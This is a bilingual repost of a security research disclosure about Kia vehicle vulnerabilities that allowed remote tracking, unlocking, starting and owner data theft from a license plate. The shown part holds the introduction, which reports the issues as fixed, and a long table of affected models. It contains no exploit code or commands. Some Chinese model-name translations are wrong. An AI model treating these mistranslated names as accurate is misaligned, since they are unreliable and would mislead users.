CTF导航 CTF导航

Hacking Kia: Remotely Controlling Cars With Just a License Plate

汽车安全 3周前 admin
74 0 0

Hacking Kia: Remotely Controlling Cars With Just a License Plate

Introduction 介绍

On June 11th, 2024, we discovered a set of vulnerabilities in Kia vehicles that allowed remote control over key functions using only a license plate. These attacks could be executed remotely on any hardware-equipped vehicle in about 30 seconds, regardless of whether it had an active Kia Connect subscription.
2024 年 6 月 11 日,我们在起亚车辆中发现了一组漏洞,仅使用车牌即可远程控制关键功能。这些攻击可以在大约 30 秒内在任何配备硬件的车辆上远程执行,无论该车辆是否拥有有效的 Kia Connect 订阅。

Additionally, an attacker could silently obtain personal information, including the victim’s name, phone number, email address, and physical address. This would allow the attacker to add themselves as an invisible second user on the victim’s vehicle without their knowledge.
此外,攻击者还可以悄悄获取个人信息,包括受害者的姓名、电话号码、电子邮件地址和实际地址。这将允许攻击者在受害者不知情的情况下将自己添加为受害者车辆上的隐形第二用户。

We built a tool to demonstrate the impact of these vulnerabilities where an attacker could simply (1) enter the license plate of a Kia vehicle, then (2) execute commands on the vehicle after around 30 seconds. These vulnerabilities have since been fixed, this tool was never released, and the Kia team has validated this was never exploited maliciously.
我们构建了一个工具来演示这些漏洞的影响,攻击者可以简单地 (1) 输入起亚汽车的车牌,然后 (2) 大约 30 秒后在车辆上执行命令。这些漏洞已被修复,该工具从未发布,起亚团队已验证该工具从未被恶意利用。

Vehicles Affected 受影响的车辆

Vehicle 车辆 Geolocate Vehicle 地理定位车辆 Remote Lock/Unlock 远程锁定/解锁 Remote Start/Stop 远程启动/停止 Remote Horn/Light 遥控喇叭/灯 Remote Camera 远程摄像头
2025 CARNIVAL EX 2025 年嘉年华 EX ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL SX 2025 年嘉年华SX ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL LX 2025 年嘉年华 LX ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL LXS 2025年嘉年华LXS ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL SX PRESTIGE
2025 年嘉年华 SX 威望		 ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL HYBRID SX PRESTIGE
2025 嘉年华混合动力 SX 威望		 ✅️ ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL HYBRID EX 2025 嘉年华混合动力 EX ✅️ ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL HYBRID LXS 2025 嘉年华混合动力 LXS ✅️ ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL HYBRID SX 2025 嘉年华混合动力 SX ✅️ ✅️ ✅️ ✅️ ✅️
2025 K5 EX 2025款K5 EX ✅️ ✅️ ✅️ ✅️ ✅️
2025 K5 GT 2025款K5 GT ✅️ ✅️ ✅️ ✅️ ✅️
2025 K5 GT (GT1 PKG)
2025 K5 GT(GT1 PKG)		 ✅️ ✅️ ✅️ ✅️ ✅️
2025 K5 GT-LINE 2025款K5 GT-LINE ✅️ ✅️ ✅️ ✅️
2025 K5 GT-LINE (PREMIUM PKG)
2025 K5 GT-LINE(高级套装)		 ✅️ ✅️ ✅️ ✅️
2025 K5 LXS 2025款K5 LXS ✅️ ✅️ ✅️
2025 SELTOS EX 2025 塞尔托斯 EX ✅️ ✅️ ✅️ ✅️
2025 SELTOS S 2025 塞尔托斯 S ✅️ ✅️ ✅️ ✅️
2025 SELTOS SX 2025 塞尔托斯SX ✅️ ✅️ ✅️ ✅️
2025 SELTOS X-LINE 2025 塞尔托斯 X 线 ✅️ ✅️ ✅️ ✅️
2025 SORENTO PHEV SX-PRESTIGE
2025索兰托插电式混合动力SX-PRESTIGE		 ✅️ ✅️ ✅️ ✅️ ✅️
2025 SORENTO PHEV EX 2025索兰托插电式混合动力EX ✅️ ✅️ ✅️ ✅️
2025 SORENTO LX 2025款索兰托LX ✅️ ✅️ ✅️ ✅️
2025 SOUL EX 2025 灵魂EX ✅️ ✅️ ✅️ ✅️
2025 SOUL GT-LINE 2025灵魂GT系列 ✅️ ✅️ ✅️ ✅️
2025 SOUL S 2025 灵魂 S ✅️ ✅️ ✅️ ✅️
2025 SORENTO HYBRID EX 2025 索兰托混合动力 EX ✅️ ✅️ ✅️ ✅️
2025 SORENTO HYBRID SX-PRESTIGE
2025 索兰托混合动力 SX-PRESTIGE		 ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE SX 2025款狮跑SX ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE X-LINE 2025 狮跑 X-LINE ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE X-PRO 2025款狮跑X-PRO ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE EX 2025 狮跑 EX ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE SX-PRESTIGE
2025 狮跑 SX-PRESTIGE		 ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE X-PRO PRESTIGE
2025 狮跑 X-PRO 威望		 ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE HYBRID EX 2025 狮跑混合动力 EX ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE HYBRID SX-PRESTIGE
2025 运动型混合动力 SX-PRESTIGE		 ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE PHEV X-LINE
2025 狮跑 PHEV X-LINE		 ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE PHEV X-LINE PRESTIGE
2025 狮跑 PHEV X-LINE 威望		 ✅️ ✅️ ✅️ ✅️ ✅️
2024 CARNIVAL SX 2024 年嘉年华SX ✅️ ✅️ ✅️ ✅️
2024 CARNIVAL EX 2024 年嘉年华 EX ✅️ ✅️ ✅️ ✅️
2024 CARNIVAL SX PRESTIGE
2024 年嘉年华 SX 威望		 ✅️ ✅️ ✅️ ✅️
2024 EV6 GT ✅️ ✅️ ✅️ ✅️
2024 EV6 GT-LINE ✅️ ✅️ ✅️ ✅️
2024 EV6 LIGHT 2024 EV6 灯光 ✅️ ✅️ ✅️ ✅️
2024 EV6 WIND 2024款EV6风 ✅️ ✅️ ✅️ ✅️
2024 EV9 LAND 2024 EV9 陆地 ✅️ ✅️ ✅️ ✅️
2024 EV9 GT-LINE ✅️ ✅️ ✅️ ✅️
2024 EV9 LIGHT LR 2024 EV9 轻型 LR ✅️ ✅️ ✅️ ✅️
2024 EV9 LIGHT SR 2024 EV9 轻型 SR ✅️ ✅️ ✅️ ✅️
2024 EV9 WIND 2024 EV9 风 ✅️ ✅️ ✅️ ✅️
2024 FORTE GT 2024福特GT ✅️ ✅️ ✅️ ✅️
2024 FORTE GT-LINE 2024 福特 GT 线 ✅️ ✅️ ✅️ ✅️
2024 K5 EX 2024款K5 EX ✅️ ✅️ ✅️ ✅️
2024 K5 GT 2024款K5GT ✅️ ✅️ ✅️ ✅️
2024 K5 GT-LINE 2024款K5 GT-LINE ✅️ ✅️ ✅️ ✅️
2024 NIRO SX 2024 尼罗SX ✅️ ✅️ ✅️ ✅️
2024 NIRO EX 2024 尼罗 EX ✅️ ✅️ ✅️ ✅️
2024 NIRO EX TOURING 2024 尼罗 EX 旅行版 ✅️ ✅️ ✅️ ✅️
2024 NIRO SX TOURING 2024 NIRO SX 旅行版 ✅️ ✅️ ✅️ ✅️
2024 NIRO PHEV SX TOURING
2024 NIRO PHEV SX 旅行版		 ✅️ ✅️ ✅️ ✅️
2024 NIRO PHEV EX 2024 尼罗插电式混合动力 EX ✅️ ✅️ ✅️ ✅️
2024 SELTOS EX 2024 塞尔托斯 EX ✅️ ✅️ ✅️ ✅️
2024 SELTOS SX 2024 塞尔托斯SX ✅️ ✅️ ✅️ ✅️
2024 SELTOS S 2024 塞尔托斯 S ✅️ ✅️ ✅️ ✅️
2024 SELTOS SX (SUNROOF PKG)
2024 SELTOS SX(天窗 PKG)		 ✅️ ✅️ ✅️ ✅️
2024 SELTOS X-LINE 2024 塞尔托斯 X 线 ✅️ ✅️ ✅️ ✅️
2024 NIRO EV WAVE 2024 尼罗电动波 ✅️ ✅️ ✅️ ✅️
2024 NIRO EV WIND 2024 尼罗电动风 ✅️ ✅️ ✅️ ✅️
2024 SORENTO X-LINE EX 2024 索兰托 X-LINE EX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO EX 2024 索兰托 EX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO LX 2024款索兰托LX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO S 2024 索兰托 S ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO SX 2024款索兰托SX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO X-LINE SX 2024 索兰托 X-LINE SX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO X-LINE SX-P 2024 索兰托 X-LINE SX-P ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO HYBRID SX-PRESTIGE
2024 索兰托混合动力 SX-PRESTIGE		 ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO HYBRID EX 2024 索兰托混合动力 EX ✅️ ✅️ ✅️ ✅️
2024 SORENTO PHEV SX-PRESTIGE
2024 索兰托 PHEV SX-PRESTIGE		 ✅️ ✅️ ✅️ ✅️ ✅️
2024 SOUL EX 2024 灵魂前线 ✅️ ✅️ ✅️ ✅️
2024 SOUL GT-Line 2024 SOUL GT系列 ✅️ ✅️ ✅️ ✅️
2024 SOUL S 2024 灵魂 S ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE EX 2024 狮跑 EX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE SX 2024款狮跑SX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE X-LINE 2024 狮跑 X-LINE ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE SX-P 2024 狮跑SX-P ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE X-PRO 2024 狮跑 X-PRO ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE X-PRO PRST 2024 狮跑 X-PRO PRST ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE HYBRID EX 2024 狮跑混合动力 EX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE HYBRID SX-PRESTIGE
2024 运动型混合动力 SX-PRESTIGE		 ✅️ ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE SX 2024 碲化物 SX ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE X-LINE EX 2024 碲化物 X-LINE EX ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE LX 2024 碲化物LX ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE EX 2024 碲化物 EX ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE S 2024 碲化物 S ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE SX-PRESTIGE
2024 碲化物 SX-PRESTIGE		 ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE X-LINE SX 2024 碲化物 X-LINE SX ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE X-LINE SX-PRESTIGE
2024 碲化物 X-LINE SX-PRESTIGE		 ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE X-PRO SX 2024 碲化物 X-PRO SX ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE X-PRO SX-PRESTIGE
2024 碲化物 X-PRO SX-PRESTIGE		 ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE PHEV X-LINE
2024 狮跑 PHEV X-LINE		 ✅️ ✅️ ✅️ ✅️
2023 CARNIVAL EX 2023 嘉年华 EX ✅️ ✅️ ✅️ ✅️
2023 CARNIVAL SX 2023 嘉年华SX ✅️ ✅️ ✅️ ✅️
2023 CARNIVAL SX Prestige
2023 嘉年华 SX 威望		 ✅️ ✅️ ✅️ ✅️
2023 EV6 GT ✅️ ✅️ ✅️ ✅️
2023 EV6 GT-LINE ✅️ ✅️ ✅️ ✅️
2023 EV6 LIGHT 2023 EV6 灯光 ✅️ ✅️ ✅️ ✅️
2023 EV6 WIND 2023款EV6风 ✅️ ✅️ ✅️ ✅️
2023 K5 EX 2023款K5 EX ✅️ ✅️ ✅️ ✅️
2023 K5 GT 2023款K5 GT ✅️ ✅️ ✅️ ✅️
2023 K5 GT-LINE 2023款K5 GT-LINE ✅️ ✅️ ✅️ ✅️
2023 FORTE GT-LINE 2023 福特 GT 线 ✅️ ✅️ ✅️ ✅️
2023 FORTE SX 2023 福特SX ✅️ ✅️ ✅️ ✅️
2023 NIRO SX 2023 尼罗SX ✅️ ✅️ ✅️ ✅️
2023 NIRO SX Touring 2023 NIRO SX 旅行车 ✅️ ✅️ ✅️ ✅️
2023 NIRO TOURING 2023 尼罗旅行版 ✅️ ✅️ ✅️ ✅️
2023 NIRO EX 2023 尼罗 EX ✅️ ✅️ ✅️ ✅️
2023 NIRO TOURING SE 2023 NIRO 旅行版 SE ✅️ ✅️ ✅️ ✅️
2023 NIRO EX Touring 2023 NIRO EX 旅行车 ✅️ ✅️ ✅️ ✅️
2023 NIRO S 2023 尼罗 S ✅️ ✅️ ✅️ ✅️
2023 SELTOS Nightfall 2023 塞尔托斯夜幕降临 ✅️ ✅️ ✅️ ✅️
2023 SELTOS EX 2023 塞尔托斯 EX ✅️ ✅️ ✅️ ✅️
2023 SELTOS SX 2023 塞尔托斯SX ✅️ ✅️ ✅️ ✅️
2023 SELTOS S 2023 塞尔托斯 S ✅️ ✅️ ✅️ ✅️
2023 SORENTO EX SPORT 2023 索兰托 EX 运动版 ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO SX-PRESTIGE 2023 索兰托 SX-PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO S 2023 索兰托 S ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO SX 2023索兰托SX ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO X-LINE EX 2023 索兰托 X-LINE EX ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO X-LINE SX-PRESTIGE
2023 索兰托 X-LINE SX-PRESTIGE		 ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO X-LINE S 2023 索兰托 X-LINE S ✅️ ✅️ ✅️ ✅️ ✅️
2023 NIRO EV WAVE 2023 尼罗电动波 ✅️ ✅️ ✅️ ✅️
2023 NIRO EV WIND 2023 NIRO 电动风车 ✅️ ✅️ ✅️ ✅️
2023 NIRO PHEV EX 2023 尼罗插电式混合动力 EX ✅️ ✅️ ✅️ ✅️
2023 NIRO PHEV SX TOURING
2023 尼罗插电式混合动力 SX 旅行版		 ✅️ ✅️ ✅️ ✅️
2023 RIO S 2023 里约小号 ✅️ ✅️ ✅️ ✅️
2023 SORENTO HYBRID SX-P 2023 索兰托混合动力SX-P ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO HYBRID EX 2023 索兰托混合动力 EX ✅️ ✅️ ✅️ ✅️
2023 SOUL GT-Line 2023 SOUL GT系列 ✅️ ✅️ ✅️ ✅️
2023 SOUL EX 2023 灵魂前线 ✅️ ✅️ ✅️ ✅️
2023 SOUL S 2023 灵魂 S ✅️ ✅️ ✅️ ✅️
2023 SORENTO PHEV SX-PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE EX ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE X-Line ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE SX ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE SX-Prestige ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE X-Pro Prestige ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE X-Pro ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE PHEV X-Line Prestige ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE PHEV X-Line ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE HYBRID EX ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE HYBRID SX-Prestige ✅️ ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE LX ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE EX ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE X-PRO SX-PRESTIGE ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE SX ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE SX-PRESTIGE ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE X-LINE EX ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE X-PRO SX ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE X-LINE SX-PRESTIGE ✅️ ✅️ ✅️ ✅️
2023 STINGER GT-Line ✅️ ✅️ ✅️ ✅️ ✅️
2023 STINGER GT2 ✅️ ✅️ ✅️ ✅️ ✅️
2022 EV6 GT-Line ✅️ ✅️ ✅️ ✅️
2022 EV6 GT-Line (1st Edition) ✅️ ✅️ ✅️ ✅️
2022 EV6 LIGHT ✅️ ✅️ ✅️ ✅️
2022 EV6 WIND ✅️ ✅️ ✅️ ✅️
2022 EV6 WIND (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2022 CARNIVAL EX ✅️ ✅️ ✅️ ✅️
2022 CARNIVAL SX ✅️ ✅️ ✅️ ✅️
2022 CARNIVAL SX PRESTIGE ✅️ ✅️ ✅️ ✅️
2022 FORTE GT ✅️ ✅️ ✅️ ✅️
2022 FORTE GT-Line (Premium) ✅️ ✅️ ✅️ ✅️
2022 FORTE GT (GT2) ✅️ ✅️ ✅️ ✅️
2022 FORTE GT (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2022 FORTE GT-Line ✅️ ✅️ ✅️ ✅️
2022 FORTE GT-Line (Sport Premium) ✅️ ✅️ ✅️ ✅️
2022 FORTE GT-Line (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2022 K5 GL-Line Premium ✅️ ✅️ ✅️ ✅️
2022 K5 EX ✅️ ✅️ ✅️ ✅️
2022 K5 EX (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2022 K5 GT ✅️ ✅️ ✅️ ✅️
2022 K5 GT (GT1 Pkg) ✅️ ✅️ ✅️ ✅️
2022 K5 GT-LINE ✅️ ✅️ ✅️ ✅️
2022 K5 GT-Line (AWD) ✅️ ✅️ ✅️ ✅️
2022 K5 GT-Line (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2022 NIRO EX Premium ✅️ ✅️ ✅️ ✅️
2022 NIRO Touring Special Edition ✅️ ✅️ ✅️ ✅️
2022 NIRO EV EX ✅️ ✅️ ✅️ ✅️
2022 NIRO EV EX (Display) ✅️ ✅️ ✅️ ✅️
2022 NIRO EV EX Premium ✅️ ✅️ ✅️ ✅️
2022 NIRO EV S ✅️ ✅️ ✅️ ✅️
2022 NIRO PHEV EX ✅️ ✅️ ✅️ ✅️
2022 NIRO PHEV EX Premium ✅️ ✅️ ✅️ ✅️
2022 NIRO PHEV LXS ✅️ ✅️ ✅️ ✅️
2022 RIO S (4D/Tech. Pkg) ✅️ ✅️ ✅️ ✅️
2022 RIO S (5D/Tech. Pkg) ✅️ ✅️ ✅️ ✅️
2022 SELTOS EX ✅️ ✅️ ✅️ ✅️
2022 SELTOS Nightfall ✅️ ✅️ ✅️ ✅️
2022 SELTOS S ✅️ ✅️ ✅️ ✅️
2022 SELTOS SX Turbo ✅️ ✅️ ✅️ ✅️
2022 SELTOS SX Turbo (Sunroof) ✅️ ✅️ ✅️ ✅️
2022 SORENTO EX ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO S ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO SX ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO SX Prestige ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO X-Line EX ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO X-Line S ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO X-Line SX Prestige ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO HYBRID S ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO HYBRID EX ✅️ ✅️ ✅️ ✅️
2022 SPORTAGE EX (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2022 SPORTAGE Nightfall (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2022 SPORTAGE SX Turbo ✅️ ✅️ ✅️ ✅️
2022 SORENTO PHEV SX ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO PHEV SX-P ✅️ ✅️ ✅️ ✅️ ✅️
2022 SOUL EXCLAIM ✅️ ✅️ ✅️ ✅️
2022 SOUL GT-LINE ✅️ ✅️ ✅️ ✅️
2022 SOUL X-LINE ✅️ ✅️ ✅️ ✅️
2022 SOUL S ✅️ ✅️ ✅️ ✅️
2022 STINGER GT-Line ✅️ ✅️ ✅️ ✅️ ✅️
2022 STINGER GT1 (Special Edition) ✅️ ✅️ ✅️ ✅️ ✅️
2022 STINGER GT-Line (Sun & Sound) ✅️ ✅️ ✅️ ✅️ ✅️
2022 STINGER GT1 ✅️ ✅️ ✅️ ✅️ ✅️
2022 STINGER GT2 ✅️ ✅️ ✅️ ✅️ ✅️
2022 STINGER GT2 (Special Edition) ✅️ ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE EX (Black Ed, Prem. Pkg, Tow Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE EX (Black Ed, Prem. Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE EX (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE EX (Premium + Tow Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE EX (Std) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE EX (Towing Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE LX (Std) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Black Ed, Prestige Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE S (Std) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Black Ed) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Black Ed, Prestige + Tow Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Prestige + Towing Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Prestige Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Std) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Towing Pkg) ✅️ ✅️ ✅️ ✅️
2021 FORTE EX ✅️ ✅️ ✅️ ✅️
2021 FORTE GT
2021 FORTE GT (Premium Pkg)
2021 FORTE GT-Line (Premium)
2021 K5 EX ✅️ ✅️ ✅️ ✅️
2021 K5 GT (GT1 Pkg) ✅️ ✅️ ✅️ ✅️
2021 K5 EX (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2021 K5 GT-Line ✅️ ✅️ ✅️ ✅️
2021 K5 GT-Line (Special Ed.) ✅️ ✅️ ✅️ ✅️
2021 K5 LXS (AWD) ✅️ ✅️ ✅️ ✅️
2021 NIRO EV EX ✅️ ✅️ ✅️ ✅️
2021 NIRO EV EX PREMIUM ✅️ ✅️ ✅️ ✅️
2021 NIRO EX PREMIUM ✅️ ✅️ ✅️ ✅️
2021 NIRO TOURING ✅️ ✅️ ✅️ ✅️
2021 NIRO TOURING SPECIAL EDITION ✅️ ✅️ ✅️ ✅️
2021 SEDONA EX
2021 SEDONA SX ✅️
2021 SEDONA EX (Premium Pkg)
2021 NIRO PHEV EX ✅️ ✅️ ✅️ ✅️
2021 NIRO PHEV LXS ✅️ ✅️ ✅️ ✅️
2021 NIRO PHEV EX Premium ✅️ ✅️ ✅️ ✅️
2021 RIO S (4D/Tech. Pkg) ✅️
2021 SELTOS SX Turbo ✅️ ✅️ ✅️ ✅️
2021 SELTOS SX Turbo (Sunroof) ✅️ ✅️ ✅️ ✅️
2021 SORENTO SX ✅️ ✅️ ✅️ ✅️ ✅️
2021 SORENTO EX ✅️ ✅️ ✅️ ✅️
2021 SORENTO EX (Pano Pkg) ✅️ ✅️ ✅️ ✅️
2021 SORENTO S ✅️ ✅️ ✅️ ✅️
2021 SORENTO S (Pano Pkg) ✅️ ✅️ ✅️ ✅️
2021 SORENTO SX-P ✅️ ✅️ ✅️ ✅️ ✅️
2021 SORENTO SX-P (X-Line) ✅️ ✅️ ✅️ ✅️ ✅️
2021 SOUL EX ✅️ ✅️ ✅️ ✅️
2021 SOUL Turbo ✅️ ✅️ ✅️ ✅️
2021 STINGER GT-Line (Sun & Sound Pkg) ✅️
2021 STINGER GT
2021 STINGER GT-Line
2021 STINGER GT1 ✅️
2021 STINGER GT2 ✅️
2021 SPORTAGE EX (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2021 SPORTAGE S (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2021 SPORTAGE SX Turbo ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE EX (Black Ed, Prem. Pkg, Tow Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE EX ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE EX (Premium + Tow Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE EX (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Black Ed, Prestige Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE EX (Towing Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Black Ed, Tow Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE LX ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE S ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Black Ed) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Prestige + Towing Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Black Ed, Prestige + Tow Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Prestige Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Std) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Towing Pkg) ✅️ ✅️ ✅️ ✅️
2020 FORTE EX (Special Edition) ✅️ ✅️ ✅️ ✅️
2020 FORTE GT (GT2) (Auto Climate)
2020 FORTE EX
2020 FORTE GT-Line (Premium)
2020 FORTE GT-Line (Premium, Auto Climate)
2020 FORTE GT
2020 FORTE GT (Auto Climate)
2020 FORTE GT (GT2)
2020 CADENZA Limited ✅️ ✅️ ✅️ ✅️
2020 CADENZA Technology ✅️ ✅️ ✅️ ✅️
2020 K900 Luxury ✅️ ✅️ ✅️ ✅️
2020 NIRO EV EX ✅️ ✅️ ✅️ ✅️
2020 NIRO EV EX Premium ✅️ ✅️ ✅️ ✅️
2020 NIRO PHEV LXS ✅️ ✅️ ✅️ ✅️
2020 NIRO PHEV EX ✅️ ✅️ ✅️ ✅️
2020 NIRO PHEV EX Premium ✅️ ✅️ ✅️ ✅️
2020 NIRO EX Premium ✅️ ✅️ ✅️ ✅️
2020 NIRO Touring Special Edition ✅️ ✅️ ✅️ ✅️
2020 NIRO Touring ✅️ ✅️ ✅️ ✅️
2020 OPTIMA EX Premium ✅️ ✅️ ✅️ ✅️
2020 OPTIMA PHEV EX (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2020 SEDONA EX (Premium Pkg, Rear Seat Ent. )
2020 SEDONA EX
2020 SEDONA EX (Premium Pkg)
2020 SEDONA EX (Rear Seat Ent.)
2020 SEDONA SX ✅️
2020 SEDONA SX (Rear Seat Ent.) ✅️
2020 RIO S (4D/Tech. Pkg)
2020 RIO S (5D/Tech. Pkg)
2020 SOUL EX ✅️ ✅️ ✅️ ✅️
2020 SOUL EX (Designer) ✅️ ✅️ ✅️ ✅️
2020 SOUL GT 1.6L Turbo ✅️ ✅️ ✅️ ✅️
2020 SORENTO SX ✅️ ✅️ ✅️ ✅️
2020 SPORTAGE EX (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2020 SPORTAGE S (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2020 SPORTAGE SX Turbo (Beige) ✅️ ✅️ ✅️ ✅️
2020 SPORTAGE SX Turbo (Std) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE EX (Premium + Tow Pkg) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE EX (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE S (8 Passenger) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE EX ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE SX (Prestige Pkg) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE EX (Towing Pkg) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE LX ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE S ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE SX ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE SX (Prestige + Towing Pkg) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE SX (Towing Pkg) ✅️ ✅️ ✅️ ✅️
2020 STINGER GT
2020 STINGER GT-Line
2020 STINGER GT1 ✅️
2020 STINGER GT2 ✅️
2019 FORTE EX
2019 FORTE S (Premium)
2019 FORTE EX (Launch) ✅️
2019 FORTE S
2019 CADENZA Cadenza (Ltd) ✅️
2019 CADENZA Cadenza (Premium)
2019 CADENZA Cadenza (Technology) ✅️
2019 NIRO EX (Adv. Technology)
2019 NIRO EX (Premium) ✅️
2019 NIRO LX
2019 NIRO LX (Adv. Tech)
2019 NIRO EX (Std)
2019 NIRO FE
